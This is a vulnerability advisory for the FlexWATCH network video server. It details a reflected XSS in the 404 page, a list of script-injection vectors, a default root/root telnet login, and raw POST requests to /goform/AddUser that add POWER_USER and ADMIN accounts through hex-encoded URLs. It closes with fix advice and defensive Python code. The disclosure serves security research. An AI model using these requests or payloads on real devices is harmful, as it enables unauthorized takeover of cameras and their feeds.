#=============================================================
# Unauthorized Access vulnerability in FlexWATCH camera Server
# Second Assault !
#=============================================================

Author: SLAIZER
mail: slaizer[at]phreaker.net

Vendor : SEYEON Technology
System : FlexWATCH Network Video Server
url : http://www.flexwatch.com/
Mail: sytech@seyeon.co.kr
Product Version : FlexWATCH-50 Web Ver 2.2 tested Build Nov 18 2003

#====================
# Introduction
#====================

A few months ago I published another document explaining how to obtain full access to the system in an easy and fast way. The same document was sent to SEYEON before being published; since I got no response from them, I decided to publish it.

Two months after it was published, SEYEON got in touch with me. They asked me to test a new system, already patched against the bug, so that I would tell them which bugs I had found. They demanded that I remove the name of the company from my previous document and that I should not publish any more... In addition to doing work for the company, with many economic benefits for them, completely for free, something I do not accept. I will always be ready to help whoever needs it, for free, as long as nothing is demanded of me, and much less when proprietary software is involved. I'm sorry if it seems exaggerated, but nobody lives on air.

#===================
# Description
#===================

Let's go and examine the new system!

slaizer@Necora:~$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs          <---------- :) the same everlasting banner
Date: Mon Dec 1 01:01:26 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: http://victim/index.htm
Age: 1

In the other version I did not examine the services in use, because I did not need it :P.
root@Necora:~$ nmap -sS -P0 victim
Interesting ports on victim (censored :P):
PORT     STATE SERVICE
21/tcp   open  ftp      <-------
23/tcp   open  telnet   <------- Default user/pass are root/root :P
80/tcp   open  http     <------- These are also not very interesting right now,
1024/tcp open  kdm      <------- but it would be nice if they used ssl :P.
1755/tcp open  wms      <-------

It's time to see the web application:

Sailing along the web we notice that the system has changed a bit as far as the directory tree goes, but for the rest it seems to be the same.

The first thing we meet is a bug in the page responsible for notifying us that the URL we want to reach doesn't exist (404 error): a piece of XSS :P.

Cross-Site Scripting. Example:

mozilla http://victim/hehe.html<H1><script>alert('Security?');</script>

Results:

Access Error: Page not found
when trying to obtain /hehe.html
cannot open URL /hehe.html

(The code is executed perfectly, and even executed twice, hehe. The result is two windows alerting us with the message "Security?".)

View source:

<html>
<head>
<title>Document Error: Page not found</title>
</head>
<body>
<h2>Access Error: Page not found</h2>
when trying to obtain <b>/hehe.html<h1><script>alert('Security ?');</script></b>
<br><p>Cannot open URL <b>/hehe.html<h1><script>alert('Security ?');</script></b></p>
</body>
</html>

Note: This type of method is well known as a way to gain access to the system by means of malicious links that steal the identification of some user. document.write / document.cookie / document.location..
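To make the defect above concrete, here is an added example, not code from the advisory or from SEYEON: the 404 page is rebuilt as a Python template from the HTML shown in the response, first in the reflected form the advisory demonstrates and then in the escaped form that the later "substitute malicious characters with their HTML equivalent" advice calls for. The template text and the probe path are taken from the page; the function names and the `contains_markup` check are assumptions made for the demonstration.

```python
# Added example (not FlexWATCH code): the advisory's 404 page rebuilt as a
# template, reflected vs. escaped. Only the escaped variant is safe to emit.
import html

# Template reconstructed from the "View source" shown in the advisory.
TEMPLATE = (
    "<html>\n<head>\n<title>Document Error: Page not found</title>\n</head>\n<body>\n"
    "<h2>Access Error: Page not found</h2>\n"
    "when trying to obtain <b>{path}</b>\n"
    "<br><p>Cannot open URL <b>{path}</b></p>\n"
    "</body>\n</html>\n"
)


def not_found_reflected(path: str) -> str:
    """Behaviour the advisory shows: the requested path is copied into the page
    verbatim, so any markup in it becomes part of the document (twice here,
    which is why the alert fires twice)."""
    return TEMPLATE.replace("{path}", path)


def not_found_escaped(path: str) -> str:
    """Hardened version: every character with an HTML meaning (<, >, &, quotes)
    is replaced by its entity before the path is placed inside the document."""
    return TEMPLATE.replace("{path}", html.escape(path, quote=True))


def contains_markup(page: str) -> bool:
    """Demonstration check (hypothetical helper): does a live <script> tag survive?"""
    return "<script>" in page.lower()


# Constructed request path mirroring the advisory's test case.
PROBE = "/hehe.html<H1><script>alert('Security?');</script>"

if __name__ == "__main__":
    print(not_found_escaped(PROBE))
```

The escaped page still tells the user which URL failed; it just renders the path as text (`&lt;script&gt;`) instead of executing it.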
I present different JavaScript injection methods, extracted from Globbes Security Advisory #33:

<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]"> [IE]
<input type="image" dynsrc="javascript:[code]"> [IE]
<bgsound src="javascript:[code]"> [IE]
&<script>[code]</script>
&{[code]}; [N4]
<img src=&{[code]};> [N4]
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]"> [IE]
<img src="mocha:[code]"> [N4]
<img src="livescript:[code]"> [N4]
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([link to code]);"> [IE]
<div style="binding: url([link to code]);"> [Mozilla]
<div style="width: expression([code]);"> [IE]
<style type="text/javascript">[code]</style> [N4]
<object classid="clsid:..." codebase="javascript:[code]"> [IE]
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]

The information the client sends to the server must always be verified; in this case the most obvious serious solution is to check that malicious characters are not inserted, for example by substituting them with their HTML equivalents.

------------ u0xa ---------------

Where I want to get to is this URL: admin/aindex.htm. That is where the system administration is found, so, trying and using some imagination, I check what happens when the request is sent in hexadecimal format.
Example:

slaizer@Necora:~$ ./urlhex.pl http://victim/admin/aindex.htm
------------ Url encode to hex mode ----------------
http://victim/%61%64m%69n/a%69nde%78.%68t%6D
-----------------By SLAIZER tools ------------------

I obtain this in plain text:

------ code -----
<html>
<head>
<script language="Javascript">
onBlur=self.focus()
</script>
<frameset cols="196,*" framespacing="0" frameborder="0">
<frame src="admin.htm" name="menu_frame" id="menu_frame" scrolling="Auto" marginwidth="0" marginheight="0">
<frame src="videocfg.htm" name="main_frame" id="tool_frame" scrolling="Auto" marginwidth="10" marginheight="0">
</frameset>
</head>
</html>
----- code -----

:D It's my friend the configuration frameset, and it's in plain text... We are on the right track; let's see if we can do something with this.

slaizer@Necora:~$ ./urlhex.pl http://victim/admin/admin.htm
------------ Url encode to hex mode ----------------
http://victim/adm%69%6E/%61%64%6D%69n.%68tm
-----------------By SLAIZER tools ------------------

This is where we are going to focus, so let's look at it!

Important links:
 _______________________
|-Change Root           | <---- /asp/pwdcfg.asp
|Password configuration |
|                       |
|-Add User              | <---- /asp/adduser.asp   /* Let's go! */
|                       |
|-Delete User           | <---- /asp/deluser.asp
|                       |
|-Access Level          | <---- /asp/chglimit.asp
|_______________________|

slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <---- /* This is /admin/asp/adduser.asp hex-encoded */
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK

----------- u0xa ------------
<br>User, "slaizer" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------

It seems the POST went through correctly, but on trying to log in it shows us this error directly:

Access Error: Forbidden
When trying to obtain /admin/aindex.htm
Access Denied Prohibited User.
-------------------------------

foh.... but... I log in at:

http://victim/app/idxas.html   <----- Camera Administration.

Login: slaizer
password: root123

|o_O| <- hehe !! We already have access to all Cameras!!! using the login slaizer with the password root123 that we added in the previous step.

We have already made a great step forward... But... the solution is simpler than it seems..
The added user belongs to POWER_USER. Earlier, having this user would really have been more than enough, but it is enough for us to do one more test and add another user, this time to the ADMIN group:

Example

slaizer@Necora:~$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://victim/adm%69n/a%73%70/a%64duser.%61%73p   <---- /* This is /admin/asp/adduser.asp hex-encoded */
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 147
Pragma: no-cache

RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=rezials&password=123root&passconf=123root&group=ADMIN&enabled=on&ok=OK

----------- u0xa ------------
<br>User, "rezials" is successfully added.<br><br>User configuration is successfully saved.<br></font></b>
----------- u0xa ------------

So far OK! I use the login rezials & password 123root and..... :D

Congratulations! You are ADMIN!!! You can already do what you want in the system!!!

The problem was that the /admin directory was no longer allowing users access, as it had previously.

#=========================
# Solution :
#=========================

Always verify the type of request that the client makes; as you can see, I have used a mixture of hexadecimal-encoded and ASCII characters. The best solution is to create identification sessions and to allow access to such directories only through the session.

/* Note : log in at www.flexwatch.com as technical e-mail support... xD */

#========================
# GreetSssSss!!!
#========================

- gyorgyo - Makensi - palako - overpower - zapper - sha0 - IaM - phiber - kanutron - TaYoKeN - plAnadeCu - - kicat - AbeToRiuS - M0RGAN - ZeroQ ...........! xD

[[Irc-Hispano : #boinasnegras , #ngsec]]
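As an added illustration of the Solution section, and not code from the advisory or from SEYEON, the following Python gate shows the two checks the advisory's findings call for: the requested path is percent-decoded and normalised before it is compared against the protected directory, so the hex-encoded forms shown above map to `/admin/...` and are judged like the plain form, and the form handler `/goform/AddUser` is authorised on the caller's session group rather than on the directory it was reached from. The group ordering, the `/admin/` prefix rule, and the refusal of paths that still contain `%` after one decode (double encoding) are assumptions chosen for the example; `/goform/AddUser`, the encoded paths and the group names come from the page.

```python
# Added example (not FlexWATCH code): canonicalise the path, then authorise
# directories and form handlers against the session's group.
from typing import Optional
from urllib.parse import unquote
import posixpath

# Assumed policy: the /admin/ tree and the AddUser handler are ADMIN-only.
PROTECTED_PREFIXES = {"/admin/": "ADMIN"}
PROTECTED_HANDLERS = {"/goform/AddUser": "ADMIN"}

# Assumed ordering of the groups named in the advisory; ANONYMOUS = no session.
RANK = {"ANONYMOUS": 0, "USER": 1, "POWER_USER": 2, "ADMIN": 3}


class BadRequest(Exception):
    """Raised for paths the gate refuses to interpret."""


def canonical_path(raw: str) -> str:
    """Return the single canonical form of a request path.

    Decode percent-encoding exactly once, refuse anything that still looks
    encoded (double encoding is an attempt to outrun the decoder), drop the
    query string, and collapse dot segments so /admin/../admin/x is /admin/x.
    """
    path = raw.split("?", 1)[0]
    path = unquote(path)
    if "%" in path:
        raise BadRequest("encoded characters remain after one decode")
    if "\x00" in path or not path.startswith("/"):
        raise BadRequest("malformed path")
    return posixpath.normpath(path)


def required_group(path: str) -> Optional[str]:
    """Group needed for an already-canonical path, or None if it is public."""
    if path in PROTECTED_HANDLERS:
        return PROTECTED_HANDLERS[path]
    for prefix, group in PROTECTED_PREFIXES.items():
        # normpath strips a trailing slash, so match the bare directory too.
        if path.startswith(prefix) or path == prefix.rstrip("/"):
            return group
    return None


def authorize(session_group: str, raw_path: str) -> bool:
    """True if the session's group may reach the canonical form of raw_path.

    Unknown or missing session groups rank as ANONYMOUS, and a path the gate
    cannot canonicalise is denied rather than guessed at.
    """
    try:
        path = canonical_path(raw_path)
    except BadRequest:
        return False
    needed = required_group(path)
    if needed is None:
        return True
    return RANK.get(session_group, 0) >= RANK[needed]


if __name__ == "__main__":
    # Constructed requests mirroring the advisory's encoded paths.
    for group, path in [
        ("POWER_USER", "/%61%64m%69n/a%69nde%78.%68t%6D"),
        ("POWER_USER", "/goform/AddUser"),
        ("ADMIN", "/adm%69%6E/%61%64%6D%69n.%68tm"),
        ("POWER_USER", "/app/idxas.html"),
    ]:
        print(f"{group:10s} {path:40s} -> {'allow' if authorize(group, path) else 'deny'}")
```

The point of the prefix check running only after `canonical_path` is that there is exactly one spelling of every path by the time policy is consulted, so an encoder cannot produce a variant the policy does not recognise; gating `/goform/AddUser` directly closes the route by which the POWER_USER account above was created without any session at all.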